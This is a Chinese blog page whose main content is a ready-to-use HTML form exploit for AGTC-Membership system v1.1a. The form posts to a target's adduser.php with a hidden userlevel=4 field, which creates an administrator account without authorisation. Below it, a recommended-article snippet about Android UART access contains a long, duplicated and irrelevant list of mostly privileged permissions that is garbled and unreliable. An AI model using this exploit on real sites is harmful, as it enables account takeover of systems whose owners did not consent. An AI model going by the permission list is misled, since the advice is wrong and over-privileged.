Admin Added Access

最新推荐文章于 2023-11-09 18:03:53 发布
最新推荐文章于 2023-11-09 18:03:53 发布
阅读量3.1k 收藏
点赞数
文章标签: input border action access system table
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kzh4435/article/details/1859674
版权
本文介绍了一个针对 AGTC-Membershipsystemv1.1a 的远程添加管理员漏洞利用方式。通过提交特定表单,攻击者可以创建拥有最高权限的管理员账户。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<form name="form1" method="post" action="http://[target]/adduser.php">
<h3 align="center">AGTC-Membership system v1.1a (adduser) Remote Add
Admin Exploit</h3>
  <table width="40%" border="1" align="center" bordercolor="#000000">
    <tr>
      <td width="20%"><div align="right"><strong>User Name:</strong></div></td>
      <td width="40%"><input name="username" type="text" id="username" value="" maxlength="15"></td>
    </tr>
    <tr>
      <td><div align="right"><strong>Password:</strong></div></td>
      <td><input name="userpass" type="password" id="userpass" value="" maxlength="15"></td>
    </tr>
<tr>
      <td><div align="right"><strong>Email Address:</strong></div></td>
      <td><input name="useremail" type="text" id="useremail" value="" maxlength="25"></td>
    </tr>
      <input name="userlevel" type="hidden" id="userlevel" value="4">
    <tr>
      <td>&nbsp;</td>
      <td><input type="submit" name="Submit" value="Add User">
        <input type="reset" name="Submit2" value="Reset"></form></td>
    </tr>
  </table>
 
kzh4435
关注
Crowdfunding:Admin added
抛弃幻想,准备斗争
01-11 1527
1、功能分析: 思路顺序:管理员点击新增超链接,handler通过view-controller跳转到表单界面,输入新增数据,点击新增保存按钮向AdminHandler,handler将执行创建账号的操作,具体操作业务将跳转到AdminService中去实现,进行密码加密,接着进行保存,保存可能失败抛异常。 保存结果将返回值返回给handler,如果失败会交给异常映射去处理,如果成功则...
01: 重写Django admin
weixin_30911809的博客
01-08 1034
目录: 1.1 重写Django admin项目各文件作用 # 1.2 重写Django admin用户认证 1.3 将要显示的表注册到我们自己的kind_admin.py中 1.4 项目首页:显示注册的app名、表名(kind_admin_index.html 页面1) 1.5 展示表中各条数据(display_table_obj.html 页面2) 1.6 添加数...
keycloak异常关闭报错username ‘admin‘ already added时卡死无法重启的问题处理
闫玉林的博客
05-19 1382
你可以通过将该文件从容器复制到本地机器来修复故障容器:“docker cp keycloak:/opt/jboss/tools/docker-entrypoint.sh .”将其注释掉 “set -eou pipefail” 这一行,然后使用“docker cp docker-entrypoint.sh keycloak:/opt/jboss/tools/”将其复制回容器,并重新启动容器。在干净的启动/关闭之后,你可以再次恢复(取消注释)这一行。这个问题发生在Keycloak启动过程中被中断的情况下。
cephadm 创建 ceph cluster
最新发布
chenhongloves的博客
11-09 274
默认情况下, ceph.conf 文件和 client.admin 密钥环的副本保留在具有 _admin 标签的所有主机上的 /etc/ceph 中。我们通常建议为一台或多台其他主机指定 _admin 标签,以便可以在多台主机上轻松访问 Ceph CLI(例如,通过 cephadm shell )。fsid 可以通过 cephadm ls, docker ps, cat /etc/ceph/ceph.conf 等来查找。3 个 monitor, 3 个 osd,3 个 mds, 3 个 rgw。
MinIO客户端mc基础命令学习
热门推荐
mikelv01的博客
09-16 1万+
MinIO Client完全指南 MinIO Client 完全指南 config命令 - 管理配置文件 config host 命令提供了一个方便管理 ~/.mc/config.json 配置文件中的主机信息的方式,你也可以用文本编辑器手动修改这个配置文件 用法: mc config host COMMAND [COMMAND FLAGS | -h] [ARGUMENTS...] COMMANDS: add, a 添加一个新的主机到配置文件。 remove, rm 从配置文件中
Django Admin - 将model的Add(增加功能去掉)
zqhhuiyi的博客
04-13 1531
只需这样做即可:class MyAdmin(admin.ModelAdmin): *def has_add_permission(self, request): return False*
Salesforce admin初级考试试题详解(每日5题)6-10
weixin_46077528的博客
07-06 1912
试题分析在B站 (LeoK的云课堂) 视频讲解 NO.6 What is the maximum number of objects that can be added to a custom report type? A. Two as long as the objects have associations B. One as long as the object has a master -child relationship C. Unlimited as long as the.
AWS学习笔记——Chapter5 Identity and Access Management and Security on AWS
坚果壳的学习之旅
11-14 1160
Identity and Access Management and Security on AWS 1.    Authentication (认证) Managing users and their access Managing federated users and their access 2.    Authorization...
vue初始化项目出现unable to access ‘httpsgithub.comnhnraphael.git’解决有效 2021-12-30
m0_67401545的博客
06-18 6824
vue初始化项目出现npmERR! fatal: unable to access ‘https://github.com/nhn/raphael.git/’: OpenSSL SSL_read:错误 查看版本 解决方法:2021-12-30 解决了。这个错的原因是 tui-editor引起的,1、先删除package.json的 tui-editor配置项运行npm i 或者 yarn install会正常编译。2、在手动安装 tui-editor 会如下提示,即安装到了最新的tui-editor了...
CDH6.1.0环境搭建 完成后 登录admin账户失败
baidu_18355515的专栏
02-14 3892
CDH环境搭建完成,启动cloudera-manager-server成功,下面是启动日志 [root@node-1 ~]# sudo systemctl start cloudera-scm-server [root@node-1 ~]# sudo tail -f /var/log/cloudera-scm-server/cloudera-scm-server.log 2019-02-14 ...
ubuntu下pip的安装、升级和使用
u013049912的博客
10-25 3363
https://blog.youkuaiyun.com/wzyaiwl/article/details/81263419
Anaconda升级pip包
zsj540070的博客
04-04 1085
Anaconda第一次用这个pip install -i http://pypi.douban.com/simple/ pip -U --trusted-host pypi.douban.com --user。可能会报错但是会提示你能用的值指令。python中用这个。
在Android下如何调用UART口
06-07
在Android下调用UART口,一般需要以下几个步骤: 1. 打开UART口:通过打开/dev/ttySx或/dev/ttyUSBx设备节点,使用open()函数打开UART口,获取UART口的文件描述符。 2. 配置UART口:通过ioctl()函数,设置UART口的通信参数,如波特率、数据位、停止位、校验位等。 3. 读取和写入数据:通过read()和write()函数,从UART口读取数据或向UART口写入数据。 4. 关闭UART口:使用close()函数关闭UART口的文件描述符。 需要注意的是,Android系统的权限管理机制比较严格,访问UART口需要申请相应的权限。在AndroidManifest.xml文件中,需要添加如下权限声明: ``` <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" /> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" /> <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.WAKE_LOCK" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.BLUETOOTH" /> <uses-permission android:name="android.permission.BLUETOOTH_ADMIN" /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" /> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" /> <uses-permission android:name="android.permission.CAMERA" /> <uses-permission android:name="android.permission.RECORD_AUDIO" /> <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" /> <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" /> <uses-permission android:name="android.permission.VIBRATE" /> <uses-permission android:name="android.permission.FLASHLIGHT" /> <uses-permission android:name="android.permission.READ_LOGS" /> <uses-permission android:name="android.permission.GET_TASKS" /> <uses-permission android:name="android.permission.RESTART_PACKAGES" /> <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" /> <uses-permission android:name="android.permission.WRITE_SETTINGS" /> <uses-permission android:name="android.permission.ACCESS_SUPERUSER" /> <uses-permission android:name="android.permission.SYSTEM_OVERLAY_WINDOW" /> <uses-permission android:name="android.permission.SET_DEBUG_APP" /> <uses-permission android:name="android.permission.SET_PROCESS_LIMIT" /> <uses-permission android:name="android.permission.SET_ALWAYS_FINISH" /> <uses-permission android:name="android.permission.SEND_SMS" /> <uses-permission android:name="android.permission.RECEIVE_SMS" /> <uses-permission android:name="android.permission.WRITE_SMS" /> <uses-permission android:name="android.permission.READ_SMS" /> <uses-permission android:name="android.permission.RECEIVE_MMS" /> <uses-permission android:name="android.permission.RECEIVE_WAP_PUSH" /> <uses-permission android:name="android.permission.WRITE_APN_SETTINGS" /> <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> <uses-permission android:name="android.permission.INSTALL_PACKAGES" /> <uses-permission android:name="android.permission.DELETE_PACKAGES" /> <uses-permission android:name="android.permission.CLEAR_APP_CACHE" /> <uses-permission android:name="android.permission.DELETE_CACHE_FILES" /> <uses-permission android:name="android.permission.MOVE_PACKAGE" /> <uses-permission android:name="android.permission.CHANGE_COMPONENT_ENABLED_STATE" /> <uses-permission android:name="android.permission.READ_CALL_LOG" /> <uses-permission android:name="android.permission.WRITE_CALL_LOG" /> <uses-permission android:name="android.permission.ADD_VOICEMAIL" /> <uses-permission android:name="android.permission.USE_SIP" /> <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" /> <uses-permission android:name="android.permission.WRITE_CONTACTS" /> <uses-permission android:name="android.permission.READ_CONTACTS" /> <uses-permission android:name="android.permission.GET_ACCOUNTS" /> <uses-permission android:name="android.permission.AUTHENTICATE_ACCOUNTS" /> <uses-permission android:name="android.permission.MANAGE_ACCOUNTS" /> <uses-permission android:name="android.permission.READ_PROFILE" /> <uses-permission android:name="android.permission.WRITE_PROFILE" /> <uses-permission android:name="android.permission.READ_SOCIAL_STREAM" /> <uses-permission android:name="android.permission.WRITE_SOCIAL_STREAM" /> <uses-permission android:name="android.permission.READ_USER_DICTIONARY" /> <uses-permission android:name="android.permission.WRITE_USER_DICTIONARY" /> <uses-permission android:name="android.permission.READ_INPUT_STATE" /> <uses-permission android:name="android.permission.BROADCAST_SMS" /> <uses-permission android:name="android.permission.BROADCAST_WAP_PUSH" /> <uses-permission android:name="android.permission.BROADCAST_PACKAGE_REMOVED" /> <uses-permission android:name="android.permission.BROADCAST_PACKAGE_CHANGED" /> <uses-permission android:name="android.permission.BROADCAST_PACKAGE_ADDED" /> <uses-permission android:name="android.permission.SEND_DOWNLOAD_COMPLETED_INTENTS" /> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.RESTART_PACKAGES" /> <uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /> <uses-permission android:name="android.permission.WAKE_LOCK" /> <uses-permission android:name="android.permission.RECORD_AUDIO" /> <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" /> <uses-permission android:name="android.permission.CAMERA" /> <uses-permission android:name="android.permission.FLASHLIGHT" /> <uses-permission android:name="android.permission.VIBRATE" /> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" /> <uses-permission android:name="android.permission.GET_TASKS" /> <uses-permission android:name="android.permission.MANAGE_ACCOUNTS" /> <uses-permission android:name="android.permission.USE_CREDENTIALS" /> <uses-permission android:name="android.permission.READ_SYNC_SETTINGS" /> <uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS" /> <uses-permission android:name="android.permission.AUTHENTICATE_ACCOUNTS" /> <uses-permission android:name="android.permission.READ_CONTACTS" /> <uses-permission android:name="android.permission.WRITE_CONTACTS" /> <uses-permission android:name="android.permission.GET_ACCOUNTS" /> <uses-permission android:name="android.permission.READ_PROFILE" /> <uses-permission android:name="android.permission.WRITE_PROFILE" /> <uses-permission android:name="android.permission.BROADCAST_STICKY" /> <uses-permission android:name="android.permission.BLUETOOTH" /> <uses-permission android:name="android.permission.BLUETOOTH_ADMIN" /> <uses-permission android:name="android.permission.RECORD_VIDEO" /> <uses-permission android:name="android.permission.READ_FRAME_BUFFER" /> <uses-permission android:name="android.permission.PERSISTENT_ACTIVITY" /> <uses-permission android:name="android.permission.SET_DEBUG_APP" /> <uses-permission android:name="android.permission.INSTALL_LOCATION_PROVIDER" /> <uses-permission android:name="android.permission.REORDER_TASKS" /> <uses-permission android:name="android.permission.SET_PREFERRED_APPLICATIONS" /> <uses-permission android:name="android.permission.READ_SYNC_STATS" /> <uses-permission android:name="android.permission.WRITE_SYNC_STATS" /> <uses-permission android:name="android.permission.GLOBAL_SEARCH" /> <uses-permission android:name="android.permission.SET_WALLPAPER" /> <uses-permission android:name="android.permission.SET_WALLPAPER_HINTS" /> <uses-permission android:name="android.permission.ACCESS_ALL_DOWNLOADS" /> <uses-permission android:name="android.permission.DOWNLOAD_WITHOUT_NOTIFICATION" /> <uses-permission android:name="android.permission.SET_TIME_ZONE" /> <uses-permission android:name="android.permission.EXPAND_STATUS_BAR" /> <uses-permission android:name="android.permission.SET_ORIENTATION" /> <uses-permission android:name="android.permission.BATTERY_STATS" /> <uses-permission android:name="android.permission.MOUNT_FORMAT_FILESYSTEMS" /> <uses-permission android:name="android.permission.CLEAR_APP_CACHE" /> <uses-permission android:name="android.permission.SEND_SMS" /> <uses-permission android:name="android.permission.WRITE_SMS" /> <uses-permission android:name="android.permission.RECEIVE_MMS" /> <uses-permission android:name="android.permission.RECEIVE_WAP_PUSH" /> <uses-permission android:name="android.permission.WRITE_APN_SETTINGS" /> <uses-permission android:name="android.permission.READ_LOGS" /> <uses-permission android:name="android.permission.SET_POINTER_SPEED" /> <uses-permission android:name="android.permission.SET_KEYBOARD_LAYOUT" /> <uses-permission android:name="android.permission.INTERNAL_SYSTEM_WINDOW" /> <uses-permission android:name="android.permission.MANAGE_APP_TOKENS" /> <uses-permission android:name="android.permission.CAMERA_DISABLE_TRANSMIT_LED" /> <uses-permission android:name="android.permission.RECEIVE_DATA_ACTIVITY_CHANGE" /> <uses-permission android:name="android.permission.RECEIVE_USER_PRESENT" /> <uses-permission android:name="android.permission.READ_PHONE_STATE_PRIVILEGED" /> <uses-permission android:name="android.permission.UPDATE_DEVICE_STATS" /> <uses-permission android:name="android.permission.ACCESS_CACHE_FILESYSTEM" /> <uses-permission android:name="android.permission.COPY_PROTECTED_DATA" /> <uses-permission android:name="android.permission.ASEC_ACCESS" /> <uses-permission android:name="android.permission.ASEC_CREATE" /> <uses-permission android:name="android.permission.ASEC_DESTROY" /> <uses-permission android:name="android.permission.ASEC_MOUNT_UNMOUNT" /> <uses-permission android:name="android.permission.ASEC_RENAME" /> <uses-permission android:name="android.permission.ASEC_UNSHARE" /> <uses-permission android:name="android.permission.ASEC_SHARE" /> <uses-permission android:name="android.permission.WRITE_GSERVICES" /> <uses-permission android:name="android.permission.READ_GSERVICES" /> <uses-permission android:name="android.permission.DELETE_PACKAGES" /> <uses-permission android:name="android.permission.READ_SYNC_SETTINGS" /> <uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS" /> <uses-permission android:name="android.permission.READ_SYNC_STATS" /> <uses-permission android:name="android.permission.WRITE_SYNC_STATS" /> <uses-permission android:name="android.permission.INTERNAL_SYSTEM_WINDOW" /> <uses-permission android:name="android.permission.MANAGE_APP_TOKENS" /> <uses-permission android:name="android.permission.CAMERA_DISABLE_TRANSMIT_LED" /> <uses-permission android:name="android.permission.RECEIVE_DATA_ACTIVITY_CHANGE" /> <uses-permission android:name="android.permission.RECEIVE_USER_PRESENT" /> <uses-permission android:name="android.permission.READ_PHONE_STATE_PRIVILEGED" /> <uses-permission android:name="android.permission.UPDATE_DEVICE_STATS" /> <uses-permission android:name="android.permission.ACCESS_CACHE_FILESYSTEM" /> <uses-permission android:name="android.permission.COPY_PROTECTED_DATA" /> <uses-permission android:name="android.permission.ASEC_ACCESS" /> <uses-permission android:name="android.permission.ASEC_CREATE" /> <uses-permission android:name="android.permission.ASEC_DESTROY" /> <uses-permission android:name="android.permission.ASEC_MOUNT_UNMOUNT" /> <uses-permission android:name="android.permission.ASEC_RENAME" /> <uses-permission android:name="android.permission.ASEC_UNSHARE" /> <uses-permission android:name="android.permission.ASEC_SHARE" /> ``` 同时,还需要在代码中申请权限,例如: ``` if (ContextCompat.checkSelfPermission(this, Manifest.permission.WRITE_EXTERNAL_STORAGE) != PackageManager.PERMISSION_GRANTED) { ActivityCompat.requestPermissions(this, new String[]{Manifest.permission.WRITE_EXTERNAL_STORAGE}, 1); } ``` 以上是大致的流程和注意事项,具体实现需要根据具体的需求和使用场景进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值